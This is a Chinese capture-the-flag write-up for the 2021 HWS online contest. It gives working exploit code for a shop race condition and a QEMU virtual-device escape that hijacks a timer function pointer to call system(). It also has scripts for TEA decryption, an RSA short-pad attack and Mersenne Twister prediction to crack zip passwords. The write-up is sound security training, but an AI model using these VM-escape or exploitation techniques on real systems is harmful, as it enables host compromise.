2021HWS线上赛-WP

shop

存在条件竞争,可以多次卖出高价值物品,重复即可得到249元从而购买flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
p = process("./pwn")
p = remote("node4.buuoj.cn","27664")
def buy(idx):
p.sendline("2".ljust(0xf,'\x00'))
p.sendline(str(idx).ljust(0xf,'\x00'))
def look():
p.sendline("1".ljust(0xf,'\x00'))
def sell(idx):
p.sendline("3".ljust(0xf,'\x00'))
p.sendline(str(idx).ljust(0xf,'\x00'))
buy(2)
sell(2)
buy(1)
sell(2)
#sleep(1)
#buy(1)
look()
p.interactive()
#flag{97d3afe8-8139-4219-801c-4f25418e73ac}

FastCP

qemu题目,根据launch.sh文件中--device FastCP确定关键词,再通过在ida里面搜索即可得到相关函数。

漏洞点存在于fastcp_cp_timer函数中:

  • 当cmd为4时,可以读取超出CP_buffer范围得到cp_timer函数指针的值
  • 当cmd为1且CP_list_cnt大于0x10时,可以覆盖到cp_timer函数指针及其参数的地址

通过cmd为4进行泄漏得到pie地址和CP_buffer,再通过cmd为1设置cp_timer为system函数地址,并覆盖其指向CP_buffer上存储命令的地址,再次执行即可获取flag。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245

#include <inttypes.h>
#include <sys/mman.h>
#include <sys/types.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
unsigned char* mmio_mem;
char *userbuf;
char *dst;
char *src;
uint64_t phy_userbuf;
uint64_t phy_dst;
uint64_t phy_dst2;
uint64_t phy_src;
uint64_t phy_src2;
uint64_t pie_base;
uint64_t libc_base;

asm(
"execve:\n"
"mov $59,%rax\n"
"syscall\n"
"ret\n"

"open:\n"
"mov $2,%rax\n"
"syscall\n"
"ret\n"

"read:\n"
"mov $0,%rax\n"
"syscall\n"
"ret\n"

"write:\n"
"mov $1,%rax\n"
"syscall\n"
"ret\n"

"exit:\n"
"mov $60,%rax\n"
"syscall\n"
"ret\n"

"mmap:\n"
"push %rcx\n"
"pop %r10\n"
"mov $9,%rax\n"
"syscall\n"
"ret\n"

"sleep:\n"
"mov $230,%rax\n"
"syscall\n"
"ret\n"

"lseek:\n"
"mov $8,%rax\n"
"syscall\n"
"ret\n"

"close:\n"
"mov $3,%rax\n"
"syscall\n"
"ret\n"

"mlock:\n"
"mov $149,%rax\n"
"syscall\n"
"ret\n"
);

struct cpu_info{
uint64_t CP_list_src;
uint64_t CP_list_cnt;
uint64_t CP_list_dst;
};

uint64_t page_offset(uint64_t addr)
{
return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
uint64_t pme, gfn;
size_t offset;

int fd = open("/proc/self/pagemap", 0);
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, 0);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
close(fd);
return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
uint64_t gfn = gva_to_gfn(addr);
//assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

void mmio_write(uint64_t addr, uint64_t value)
{
*((uint64_t*)(mmio_mem + addr)) = value;
}

void set_cp_list_src(uint64_t value){
mmio_write(8,value);
}

void set_cp_list_cnt(uint64_t value){
mmio_write(16,value);
}

void do_cp(uint64_t value){
mmio_write(24,value);
}

uint64_t mmio_read(uint64_t addr)
{
return *((uint64_t*)(mmio_mem + addr));
}
uint64_t read_cmd(){
return mmio_read(24);
}
uint64_t read_cp_list_src(){
return mmio_read(8);
}
uint64_t read_handling(){
return mmio_read(0);
}
uint64_t read_cp_list_cnt(){
return mmio_read(16);
}
int main(int argc, char *argv[])
{
write(1,"start\n",6);
// Open and map I/O memory for the strng device
int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", 0x101002);//fea00000

mmio_mem = mmap(0, 0x1000, 3, 1, mmio_fd, 0);

//printf("mmio_mem @ %p\n", mmio_mem);
// Allocate DMA buffer and obtain its physical address
userbuf = mmap(0, 0x1000, 3, 33, -1, 0);

mlock(userbuf, 0x1000);
phy_userbuf=gva_to_gpa(userbuf);
//printf("user buff virtual address: %p\n",userbuf);
//printf("user buff physical address: %p\n",(void*)phy_userbuf);
do{
dst = mmap(0, 0x2000, 3, 33, -1, 0);
mlock(dst, 0x2000);
phy_dst=gva_to_gpa(dst);
phy_dst2=gva_to_gpa(dst+0x1000);
}while((phy_dst2 - phy_dst != 0x1000));
//printf("user buff virtual address: %p\n",dst);
//printf("user buff physical address: %p\n",(uint64_t*)phy_dst);
//printf("user buff physical address2: %p\n",(uint64_t*)phy_dst2);


do{
src = mmap(0, 0x2000, 3, 33, -1, 0);
mlock(src, 0x2000);
phy_src=gva_to_gpa(src);
phy_src2=gva_to_gpa(src+0x1000);
}while((phy_src2 - phy_src != 0x1000));
//printf("user buff virtual address: %p\n",src);
//printf("user buff physical address: %p\n",(uint64_t*)phy_src);
//printf("user buff physical address2: %p\n",(uint64_t*)phy_src2);

write(1,"step2\n",6);

int index = 0;
((struct cpu_info*)userbuf)->CP_list_src= phy_src;
((struct cpu_info*)userbuf)->CP_list_cnt= 0x100;
((struct cpu_info*)userbuf)->CP_list_dst= phy_dst;
((uint64_t*)src)[0]=0x123456;
((uint64_t*)src)[1]=0x123456;
//0x7f3fd4000000

set_cp_list_cnt(1);
set_cp_list_src(phy_userbuf);
do_cp(2);
while(read_cmd()){
sleep(1);
}

((struct cpu_info*)userbuf)->CP_list_cnt= 0x1020;

set_cp_list_src(phy_userbuf);

do_cp(4);
sleep(1);
while(read_cmd()){
sleep(1);
}

pie_base = *(uint64_t*)(dst+0x1010) - 0x4dce80;
//printf("pie_base : %p\n",pie_base);

write(1,&pie_base,8);
write(1,"step3\n",6);

uint64_t system = 0x2C2180 + pie_base;
uint64_t sh = (*(uint64_t*)(dst+0x1018));
((struct cpu_info*)userbuf)->CP_list_src= phy_src;
((struct cpu_info*)userbuf)->CP_list_cnt= 0x1020;
((struct cpu_info*)userbuf)->CP_list_dst= phy_dst;

(*(uint64_t*)(src+0x1000))=(*(uint64_t*)(dst+0x1000));
(*(uint64_t*)(src+0x1008))=(*(uint64_t*)(dst+0x1008));
(*(uint64_t*)(src+0x1010))=(*(uint64_t*)(dst+0x1010));
(*(uint64_t*)(src+0x1018))=(*(uint64_t*)(dst+0x1018));
(*(uint64_t*)(src+0x1010))=system;
(*(uint64_t*)(src+0x1018))=sh+0xa00+0x100;
(*(char*)(src+0x100))='c';
(*(char*)(src+0x101))='a';
(*(char*)(src+0x102))='t';
(*(char*)(src+0x103))=' ';
(*(char*)(src+0x104))='/';
(*(char*)(src+0x105))='f';
(*(char*)(src+0x106))='l';
(*(char*)(src+0x107))='a';
(*(char*)(src+0x108))='g';
set_cp_list_cnt(0x11);
set_cp_list_src(phy_userbuf);

do_cp(1);
while(read_cmd()){
sleep(1);
}

//printf("system_addr : %p\n",*(uint64_t*)(dst));
do_cp(1);

}

上传:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env python2
# encoding: utf-8

from pwn import *
import base64
import sys
import os
context.log_level = 'debug'
os.system('gcc -e main -static ./exp.c -o ./exp -nostdlib')
os.system('strip ./exp')
os.system('upx ./exp')
f = open("exp", "rb")
exp = f.read()
f.close()
print(len(exp))
step = 0x200

r = remote('118.195.171.57', 443)
r.recvuntil('VMEscape login:')
r.sendline('root')
r.recvuntil('#')
r.sendline('')

log.info('uploading...')
for i in range(0,len(exp)/step+1):
b64_exp = base64.b64encode(exp[step*i:step*(i+1)])
r.recvuntil('#')
r.sendline('echo %s >> ./b64_exp'%b64_exp)
log.success('upload success')

r.recvuntil('#')
r.sendline('base64 -d ./b64_exp > ./exp')
r.recvuntil('#')
r.sendline('chmod 777 exp')
r.recvuntil('#')
r.sendline('./exp')

r.interactive()

aet-reverse

tea加密相关的,抄代码,然后将顺序调换即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
int decode(int a2)
{
int v4; // [esp+8h] [ebp-28h]
int v5; // [esp+Ch] [ebp-24h]
int v6; // [esp+10h] [ebp-20h]
int v7; // [esp+14h] [ebp-1Ch]
unsigned int j; // [esp+1Ch] [ebp-14h]
unsigned int i; // [esp+20h] [ebp-10h]
int v10; // [esp+24h] [ebp-Ch]
unsigned int v11; // [esp+28h] [ebp-8h]
unsigned int v12; // [esp+2Ch] [ebp-4h]

v7 = (3 << 8) | (1 << 16) | (0 << 24) | 4;
v6 = (7 << 8) | (6 << 16) | (5 << 24) | 8;
v5 = (11 << 8) | (10 << 16) | (9 << 24) | 12;
v4 = (15 << 8) | (14 << 16) | (13 << 24) | 0;
for ( i = 0; 4 > i; ++i )
{
v10 = 0x20*0x9E3779B9;
v12 = ((*(char *)(8 * i + 2 + a2)&0xff) << 8) | ((*(char *)(8 * i + 1 + a2)&0xff) << 16) | ((*(char *)(8 * i + a2)&0xff) << 24) | (*(char *)(8 * i + 3 + a2))&0xff;
v11 = ((*(char *)(8 * i + 6 + a2)&0xff) << 8) | ((*(char *)(8 * i + 5 + a2)&0xff) << 16) | ((*(char *)(8 * i + 4 + a2)&0xff) << 24) | (*(char *)(8 * i + 7 + a2)&0xff);
for ( j = 0; j <= 0x1F; ++j )
{
v11 -= (v12 + v10) ^ (16 * v12 + v5) ^ ((v12 >> 5) + v4);
v12 -= (v11 + v10) ^ (16 * v11 + v7) ^ ((v11 >> 5) + v6);
v10 -= 0x9E3779B9;
}
*(char *)(8 * i + a2) = (v12/0x1000000)&0xff;
*(char *)(8 * i + 1 + a2) = (v12/0x10000)&0xff;
*(char *)(8 * i + 2 + a2) = (v12/0x100)&0xff;
*(char *)(8 * i + 3 + a2) = (v12)&0xff;
*(char *)(8 * i + 4 + a2) = (v11/0x1000000)&0xff;
*(char *)(8 * i + 5 + a2) = (v11/0x10000)&0xff;
*(char *)(8 * i + 6 + a2) = (v11/0x100)&0xff;
*(char *)(8 * i + 7 + a2) = (v11)&0xff;
}
return 0;
}
char a[0x20];
int main(){
strcpy(a,"\x42\xC7\xCA\x40\xC1\x75\x16\xEF\xE7\x37\x6E\x69\x1B\x0B\x0F\x78\xDF\xE0\xE0\x7B\x5F\x50\x57\x05\xF4\x73\xD2\x35\x47\xD5\x6C\x5A");
printf("%s\n",a);
decode(a);
printf("%s\n",a);
}

backdoor

根据题目提示直接搜索rootkit即可在附近发现flag:

image-20210823152243990

hello

流量包中可以发现两个密文:

image-20210823152307164

因为只是padding不同,且位数较短,利用Franklin-Reiter攻击方法,在sage上执行代码即可获得flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#脚本2
#Sage
import binascii
def short_pad_attack(c1, c2, e, n):
PRxy.<x,y> = PolynomialRing(Zmod(n))
PRx.<xn> = PolynomialRing(Zmod(n))
PRZZ.<xz,yz> = PolynomialRing(Zmod(n))
g1 = x^e - c1
g2 = (x+y)^e - c2
q1 = g1.change_ring(PRZZ)
q2 = g2.change_ring(PRZZ)
h = q2.resultant(q1)
h = h.univariate_polynomial()
h = h.change_ring(PRx).subs(y=xn)
h = h.monic()
kbits = n.nbits()//(2*e*e)
diff = h.small_roots(X=2^kbits, beta=0.4)[0] # find root < 2^kbits with factor >= n^0.4
return diff
def related_message_attack(c1, c2, diff, e, n):
PRx.<x> = PolynomialRing(Zmod(n))
g1 = x^e - c1
g2 = (x+diff)^e - c2
def gcd(g1, g2):
while g2:
g1, g2 = g2, g1 % g2
return g1.monic()
return -gcd(g1, g2)[0]
if __name__ == '__main__':
c1 =226199888918448644756982227968746328321985116022301858554198443672166664046511192215268564345898426376094090283902459640110441636420726770010000770994806563185277269200465979320365589893377418069091918532090442396603886751603663167305733566867710881487792435263851954036765024355077627565776101657845285994047225127259478223888842725657697619882058952675576467950522546405944727325816748748400930757072151974753803411875075825410215662132323783283622907642504349895222420194846774972358784353404930471430363282533597528847457511272893938256828008761907527515772662467469811929535936626565593800263948227574689518705440414368634213587105988741446978367368641973256822769215908784220309789734449328751828411012817796805182907296099522060377249696752489510340595152805018457215119257756500416362241433542631282380670560802965990054464183825706649810872267539076088793023183611390929368000088538174212497557317021558232130649505658714311457845634746833717519922531826151283006638342214774466523934632839617828984102088907011083393633695252458688340500110194100303563736683350582103762865754280928068416609493507422758397519930389697891015054896887103350205876203508540259064385048758693455947681367170495861484799223471818419141809766082
c2 =207745134179372733555510206619693253104579843394896629739037329373112962626246001660692996105153219118802888232147542928402067843843528586661320609669764821619654148259323979346482619518127693134276997096465301242211338219230471535362522814373937363157952621289752500159789059618277078792730676938098151778724478618510442014061057398587899271302933994977686954557140792181120737121774640968270568182678321489463357386240195482174580855571460603588887113368877542370808084357842481355072918452814741564939655765498035870034623573615277107259501397135275787715228937905326258102800307298720705403841763666842176243959137647629868288744563301081604801635616954497347143042211051515138964208862089552048752128912810909730479659450966735343696566762894334249104817494914722566979492521404452789748171845406174662299522224640406957367515731398609433619859550730046552804426613174272338408295496475455377327126232203966170727191424458552984898420495331422888174501682405492889556485885498653026394829501033795561393942827468916484256939660461234831948497296037001984268948594694380490331513700030501310813656424424549981824937813623457529801230191235415350842735918693953674061739761952989693408739389294218794993885245118233185798993030811
n =614841097302605203729955929451825826385630731245407304765444050136152160075416270232196891310754756560269306196561606156336813576913594854840164982931848631424774407292521710362012687934093478900284954122708280664707569091235654868301000525395360078939629380968427451630817415966643152395544725253378817336057650951709472150327395955690738068905556599556048143267959045123493403335580464278218470115001795745184558268225092224619641577591099718668732317701349174398992357749748300972812469018580873052325022765470680889385640174127657770334108999912438577122235575684290868585158464471335044106696596310903161046624897870198499582743991296379992702316645220124590338066703166528127792814503559512520239899562796644117918668854617138574268684819163423283186676870272524173353359508565110680846340027745804501343277615801570161341159399030712301208921532219260984718701528073369562514559969874210515647810613697008011307213411257388079256334292994617864207389735727092704030522132125141994059978274145655095107101848352464355417969218835698138188967409918358594915938655738516761338882364547606993485361276412819595508391665123030799494192932148904512867616718323946620838822942360634114453262536609403878810013093786418173028142285209
e =7
diff = short_pad_attack(c1, c2, e, n)
m1 = related_message_attack(c1, c2, diff, e, n)
print(binascii.unhexlify("%x" % int(m1)))

'''
b'You are so good at Coppersmith! Here is flag: flag{congratulations_let#s_hacK_4_fun}J"\xdd\x03'
'''

prophet

压缩包的密码是压缩包名,写个脚本循环解压:

1
2
3
4
5
6
7
8
9
10
import zipfile
filename = "2907706324.zip"
data = []
while (filename.endswith(".zip") and filename != "unknown.zip"):
data.append(filename.strip(".zip"))
file = zipfile.ZipFile(filename)
nextFile = file.namelist()[0]
file.extractall(pwd=bytes(filename.split(".")[0], encoding='ascii'))
filename = nextFile
print(data)

最后会解压到 unknown.zip,用Python的 randcrack 库,首先在前面的解压中把随机数整理后得到:

1
2907706324, 3954914986, 3402108112, 2054213659, 535557466, 3669544554, 2651712950, 3417770286, 4111425735, 3450915372, 3509237967, 2707743668, 889955106, 101861478, 1336215387, 3605515990, 2504989551, 1349201253, 2648082710, 2601629531, 318049225, 645746114, 3181236701, 1354915347, 4222461704, 843752451, 304987850, 818779778, 2376864436, 4258684562, 3790514089, 2536866185, 3429670676, 700863894, 2368789662, 2954948787, 1850501693, 1935300318, 4294954886, 73605939, 790901430, 3142640071, 3691984007, 1373060993, 903416285, 3121969731, 1482630290, 3383153547, 4063302022, 3991027797, 4137420745, 3132346033, 1308129484, 3547926414, 3109764388, 708591644, 1817081225, 2668947004, 4263919904, 1115482359, 3856868064, 2830700281, 2281684679, 690656972, 1556659173, 3404632260, 3760484167, 1087153620, 4194906349, 1078862195, 2976233215, 1912726912, 30407312, 3942988489, 3908451981, 3898279239, 3281283879, 3497758064, 2782905320, 2430005846, 2035396750, 4225190092, 2269868098, 3586253265, 941460198, 714278381, 3535781796, 224084415, 1439629664, 4073938538, 3695945333, 3790821082, 1641312648, 3482321608, 3915303085, 1915159805, 3430976961, 1840044358, 3171835875, 2774047027, 1987332515, 3855846206, 2973653262, 3838867780, 611114104, 226329481, 1915513324, 3700256481, 43035897, 497049019, 4217044844, 2614275824, 744712097, 182795116, 2163976688, 4263470614, 725414906, 921626470, 3746191361, 1308296962, 1147642242, 4092217985, 3542284802, 1521845264, 2075371081, 816611597, 3041634562, 233907246, 1795167862, 3915308548, 491352142, 930583074, 1708980296, 308506013, 3810969309, 3157296753, 2967229333, 1571219325, 1291393249, 1593315655, 3882964486, 1017041435, 1857378099, 1824352034, 3349753470, 674061228, 1009504030, 2542637984, 371165771, 2479782679, 1480344967, 2869593526, 1330829984, 2722781682, 283801038, 3707346602, 4001933200, 2349491114, 1250027640, 1970245425, 171593507, 826464228, 2984624889, 1700335730, 1127890176, 2298521410, 3038015291, 3114969709, 2198496951, 3020449005, 2670289699, 1384619269, 691171966, 3223611927, 2151567537, 1625186327, 2435311123, 3729455475, 2620432733, 3211878875, 241902387, 422789850, 1633356868, 244191996, 499735365, 764962662, 1681584826, 427035682, 880783233, 1389830348, 1256307054, 1454192222, 3867551829, 1911723809, 394921086, 1072555848, 3834541849, 2720240412, 4083254853, 1463684341, 2807310132, 3989708760, 4287462606, 4065391879, 2946216593, 4274887668, 960363676, 3337566213, 2138750961, 3655949854, 138734513, 128284098, 1062990215, 3761988182, 1513533102, 845839023, 1734162676, 3029907057, 3437833787, 3858879164, 2270111112, 1830381909, 1534981723, 622364075, 2734894006, 3830057679, 550477468, 2555713963, 2687705967, 397294684, 3910881510, 3725223603, 2429728499, 1711990756, 4237787834, 2814436797, 2366793701, 868414597, 2185265697, 4003527750, 510159467, 281768698, 2839069975, 414584629, 841160842, 2248608666, 3581589648, 3224270545, 2113148121, 1552518857, 3606499351, 3204575349, 1595467803, 2880744010, 1317665514, 3437941254, 110923457, 278638319, 2683805720, 2816402957, 2117760685, 4054884851, 760362861, 2010439063, 3484464314, 302788119, 1394375925, 3571572324, 2666609477, 1853851652, 3970831431, 2738683685, 2259326865, 3704336022, 1519256231, 3644881529, 104403453, 1142252920, 2572082756, 2489933602, 2709723501, 186737154, 980884132, 1865172639, 2329728320, 3876911386, 3201931453, 2772783460, 661942251, 2402901175, 3570219339, 549076455, 1690874019, 2055566646, 2662268000, 4183765260, 1452482414, 2583855929, 948034686, 2853630447, 664902618, 2764279019, 740228037, 679334472, 1068533991, 1825024640, 105521362, 2758306319, 1561107818, 2855860411, 3944090887, 1155572417, 2222936476, 2982018743, 3826797015, 993277428, 3606014829, 2651099474, 183026480, 3850093664, 1946575336, 1458018383, 919408507, 3035932662, 666805284, 2368179406, 293503818, 306642195, 1174454622, 147082512, 3045274465, 1118557200, 2280283457, 1140154721, 1589304916, 2707734613, 2687607369, 3181595711, 1786880670, 614492265, 1727186681, 616992393, 2647336831, 1328574427, 3419233391, 86915267, 791316613, 2947942465, 1207262633, 4032471359, 110173792, 580028332, 3200100754, 1443892133, 4158469394, 2866259043, 1777066304, 2631121839, 3066797076, 913793049, 500723146, 4250565153, 3140000049, 4006124671, 1557687908, 3097026744, 1600577917, 3475167182, 4190641526, 1975505102, 2746146674, 4183482895, 3942160073, 1130897678, 655001677, 1503469355, 1589952677, 289068625, 404635291, 546675708, 4243969683, 92985514, 435955479, 2070686379, 269130310, 2458267416, 230795995, 2268807924, 4152347460, 883606733, 3649663604, 1939496305, 3144082131, 1020316188, 3643489526, 991785797, 2377699574, 1064114897, 3925872718, 3153908492, 3402689587, 729363836, 3146706653, 422102318, 781824325, 2070158255, 3452344097, 1855915077, 278758154, 2809776511, 3655551017, 1427426112, 3686861685, 1715461553, 3169333119, 400766497, 849152388, 3842058653, 3324504004, 2110816760, 1993886168, 2469709606, 1634363898, 451167479, 1791892046, 3639050937, 3326490342, 3138524672, 3683265170, 1733092879, 3943402096, 3178043886, 3263958674, 2945303049, 4030290823, 3890019934, 4072034359, 1491936406, 61358117, 3877008624, 4128962903, 3153897248, 2029311561, 1711005874, 1555958789, 2460011603, 1480475039, 2029023339, 3898772821, 813779337, 3274928705, 122738867, 326424966, 2636370832, 3504714095, 4243999766, 2552626959, 1698341626, 1110935776, 3393273826, 3735680822, 3013017650, 3968600483, 3916227526, 4062882707, 4124072198, 2274124478, 2769833441, 2147761328, 3979664881, 591506957, 1000835552, 1953837853, 3630957255, 1526381419, 1320001636, 804577210, 2780887882, 57522122, 2034965857, 1092740256, 3343601480, 316588755, 856922510, 3000844043, 277993279, 2628947374, 2800837999, 3540281314, 1131935058, 2554699772, 2983012006, 3462033745, 3747092723, 2082631046, 1249369550, 1399656050, 1380244778, 3654315687, 30864042, 3601038453, 1812382865, 3977191364, 3375851263, 2615653275, 4121914158, 4067727195, 4215992615, 50813272, 3422137608, 1214655257, 2262352860, 1445338275, 1049642872, 817141685, 3537094077, 1735027729, 4235889837, 2173890300, 4024475021, 435474311, 417920911, 2752551821, 10146419, 1584825302, 2581381951, 4078884446, 2091842886, 2635154217, 1512293963, 4240561542, 2569831040, 3062146866, 2413003376, 2056726083, 137699216, 2817513365, 847863437, 1348716639, 264518910, 1581262871, 3687371459, 4081927416, 3402250258, 1538729417, 58632833, 418582971, 3579226914, 1710281441, 3968026001, 3072229268, 3255655022, 443028273, 1781242768, 845963258, 1474822808, 2287289816, 3140795568, 647767985, 3201933540, 3344108747, 3156561341, 2135178605, 3977772423, 1091627310, 3387469991, 3480076167, 998455889, 3932962822, 556790737, 3462656387, 1354331856, 331339457, 89589652, 2169976628, 499723289, 4248480190, 459434352, 1756143408, 609517004, 1625850533, 1055607475, 4078436277, 178892738, 2639443481, 1643997964, 209795222, 4031695509, 515771499, 3844892252, 1509762710, 3467911440, 2990611802, 4108349538, 1251780874, 1275943948, 2750712131, 457664709, 1234644717, 3894274138, 779659511, 1022790972, 3587520181, 4114414679, 1788862106, 784942685, 2032827515, 97699241, 502970796, 208621053, 618199448, 869691038, 1315708708, 2950393537, 316695424, 3204417376, 2157414925, 1986435697, 578058463, 2226332610, 45889470, 1939749473, 4277520616, 716509244, 3148642698, 2619738742, 395812501, 2611816764, 120484619, 3803132111, 3028743725, 3032307726, 3558459801, 2286359562, 3242070811, 2972037405, 2409275190, 333056311, 1628673919, 1222753699, 3226124314, 510049636, 1798218781, 3286822755, 2050136383, 363266297, 753159469, 1339229922, 3282010884, 3964577747, 1183093495, 3665656653, 1802113568, 586211819, 1906435982, 407943402, 3478960696, 1221962222, 2646386190, 2344832406, 3568499138, 3479343149, 1044214259, 2255694969, 2629616514, 3767094630, 366310899, 2466889679, 2533941943, 2817371332, 478094315, 3077780922, 1917154805, 3668750533, 77295478, 258422916, 3929257613, 3653596300, 749676172, 2250390103, 1052624843, 2563981631, 519704737, 2969422268, 1628120157, 4100859626, 252141936, 2978131799, 1142247725, 3804721174, 1356078034, 1198864435, 2564872115, 3858385849, 3652532995, 305266060, 482238871, 1451662628, 2189662472, 4225060244, 3266478407, 298473768, 1328477173, 1872099590, 380059855, 912553536, 2099522339, 3224313555, 2056296410, 477848639, 379190417, 3487993484, 3121969521, 2288925162, 3077843604, 1456549673, 1304340342, 2083447579, 3167117719, 3348095325, 2268107766, 1402643313, 2397212057, 1352006746, 231921187, 1313920238, 2168273889, 805130323, 2816803714, 3720840652, 3407591957, 479785258, 1217833088, 4229273758, 587760181, 1233711591, 2930015733, 3697241657, 570349524, 1000281623, 2960131310, 3941057032, 3611068081, 1929535695, 1078174814, 549556557, 2427930182, 1127864687, 3728874623, 1552852683, 246530969, 3129577778, 2828503428, 741919312, 215642980, 1167747156, 1074184265, 1803181867, 1728287989, 3994497806, 3166040995, 4102870506, 2533028438, 1554448227, 1743174913, 2757654175, 1620162669, 2326525927, 1822891531, 3118838616, 988494514, 724274952, 3466926668, 2858066332, 1508595710, 2951666140, 1637995296, 2345022808, 4293996946, 2531108812, 1393641667, 3609374661, 1294467284, 1466747081, 1787125071, 418589219, 2105433503, 2486534005, 1556969350, 4187693157, 2376356641, 2760842106, 3305118691, 2311132184, 2756948087, 3686050208, 1794448609, 2080775564, 2924248445, 2178418677, 4158669833, 3219430073, 967669386, 221829347, 730413000, 4032488141, 861524009, 3520395384, 229287210, 2928013323, 634603946, 2344109932, 2651517581, 2956026520, 3962896689, 752853056, 1576906191, 420644394, 1259665633, 1833948237, 1550770827, 2065923435, 4174111849, 3128201235, 2682226239, 3167161894, 576977612, 2487367426, 2431206872, 3390561516, 2334384070, 3436416734, 2200879126, 3180692685, 2766121590, 1064218408, 410199199, 20022323, 1718513066, 3297953226, 451443686, 2132362103, 257410781, 1541671484, 3761895270, 348365872, 816022713, 4294497492, 2625738817, 3603223866, 3078033498, 1147648777, 3514932557, 2930781580, 984846570, 4212244974, 1020179629, 3382552365, 3588342390, 2485187463, 2828961807, 4136474278, 3551225472, 4086885006, 1310692642, 2241965503, 1504390196, 1603497325, 1455103646, 366434701, 293869916, 1550592307, 4214651425, 4250886934, 1306227123, 4036718626, 2933260006, 762182112, 1830993485, 2128141366, 44628368, 2873401036, 1257136753, 3380864990, 4275919402, 789867953, 3318150127, 487054724, 3730547753, 1936887664, 171225030, 3722592745, 1340948219, 1016521820, 1447577763, 2805353516, 1417994373, 817439704, 3813079978, 1200757040, 339005780, 4232371651, 1296406800, 805088113, 2812427961, 3875582523, 4113860721, 1947280914, 3775671015, 955163233, 3603928099, 91477649, 3287607536, 4201104916, 2491411596, 460805757, 1332051516, 3368474042, 3164283116, 2874896056, 293562372, 411629539, 2220832875, 2299167075, 2579299726, 2882735860, 2668845063, 42813252, 917639463, 2216449232, 2644803904, 2031826548, 3452099002, 1103665712, 1070395870, 532734790, 4097725963, 581033399, 963298035, 823792656, 3525861586, 20973404, 2359012004, 3432019008, 2233316197, 697890212, 3568807990, 3652343610, 1398136840, 937985297, 2581792527, 2566945713, 1386694986, 2557383413, 1945328836, 1021712351, 3289407095, 2323689998, 3306271310, 3585440682, 1855892766, 2796595085, 2504479613, 1289850575, 2929745242, 2021810381, 3242210155, 3055960700, 365068549, 2513400611, 553638319, 3920510223, 2495696848, 1824819128, 1213008255, 4189990551, 1989970719, 1031033434, 531275736, 882122649, 1721700980, 3178163802, 3700771996, 1850869451, 3206165832, 1272158460, 3303927391, 4119824836, 3968831781, 3771252104, 1674478394, 530327252, 9184370, 2681387057, 1178553319, 1950066334, 3127696976, 2661749414, 1383174577, 4201508029

另存为 data.txt,预测下一个随机数后对 unknown.zip 进行解压,然后把新的密码 append 到数组后面,最新的 624 个数字再预测下一个压缩包的密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import randcrack
import zipfile
import os
def predict(data):
assert len(data) == 624
rc = randcrack.RandCrack()

for i in data:
rc.submit(int(i))
return rc.predict_randrange(0, 4294967295)
def uncompress(password):
if os.path.exists("temp.zip"):
os.remove("temp.zip")
os.rename("unknown.zip", "temp.zip")
file = zipfile.ZipFile("temp.zip")
file.extractall(pwd=bytes(str(password), encoding='ascii'))
with open("data.txt") as f:
data = f.read().split(", ")
data = data[-624:]
while True:
password = predict(data)
uncompress(password)
data = data[-623:]
data.append(password)

解压到最后一层得到文件 flag,代码会因为找不到 unknow.zip 而报错停止,打开文件 flag 即可